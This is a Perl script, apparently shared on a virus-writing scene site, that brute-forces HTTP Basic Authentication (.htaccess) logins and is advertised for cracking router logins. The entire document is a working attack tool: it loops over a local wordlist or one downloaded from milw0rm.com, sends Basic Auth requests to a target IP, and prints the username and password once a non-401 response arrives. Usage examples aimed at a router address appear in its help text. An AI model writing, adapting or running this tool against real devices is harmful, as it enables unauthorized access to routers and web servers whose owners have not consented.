htaccess Bruter

1. #!/usr/bin/perl
2. =poc
3. Simple .htaccess bruteforcer. Could be usefull to crack router logins.
4.  
5. by Perforin
6. virii.lu
7. #vxnet
8.  
9. Greetings to everyone from #vxnet and EOF
10. =cut
11.  
12. use HTTP::Request;
13. use LWP::UserAgent;
14. use LWP::Simple;
15. use File::Temp qw(tempfile);
16.  
17. use strict;
18. use warnings;
19. use diagnostics;
20.  
21. my($ip,$user,$dic) = @ARGV;
22. my($fh, $tmpfile) = tempfile("X" x 23, UNLINK => 1);
23. my($useragent,$request,$zeile,$_,@data);
24.  
25.  
26. if (@ARGV < 3) { help(); }
27.  
28. print <<"INTRO";
29. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
30. .htaccess Bruter                            
31. ~[v1.0]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
32.  
33. INTRO
34.  
35. if ($dic =~ m/--milw0rm/i) {
36. print "[~] Loading milw0rm wordlist...\n";
37. getstore('http://milw0rm.com/mil-dic.php',$tmpfile) || die "milw0rm down?!\n";
38. open(DIC,"<",$tmpfile) || die "Wordlist not found or permission denied!\n";
39. } else {
40. open(DIC,"<",$dic) || die "Wordlist not found or permission denied!\n";
41. }
42.  
43. $useragent = LWP::UserAgent->new;
44. $request = HTTP::Request->new(GET => 'http://' . $ip);
45.  
46. while(<DIC>) {
47. chomp($_);
48.  
49. $request->authorization_basic($user, $_);  
50. @data = $useragent->request($request)->as_string;
51.  
52. foreach $zeile (@data) {
53. if($zeile =~ m/401 Unauthorized/i) {
54. print "[~] Bruting...\n";
55. } else {
56. print "\n[!] Got login!\n";
57. print "[!] " .  $user . ":" . $_ . "\n";
58. exit;
59.     }
60.   }
61. }
62. print "[-] Could not be cracked!\n";
63. close(DIC);
64.  
65. sub help {
66. print <<"HELP";
67. ########################################
68.       .htaccess bruter      
69.  
70. brute.pl 192.168.1.1 admin dic.txt
71. brute.pl 192.168.1.1 admin --milw0rm
72.  
73. ###############[]###############
74. HELP
75. exit;
76. }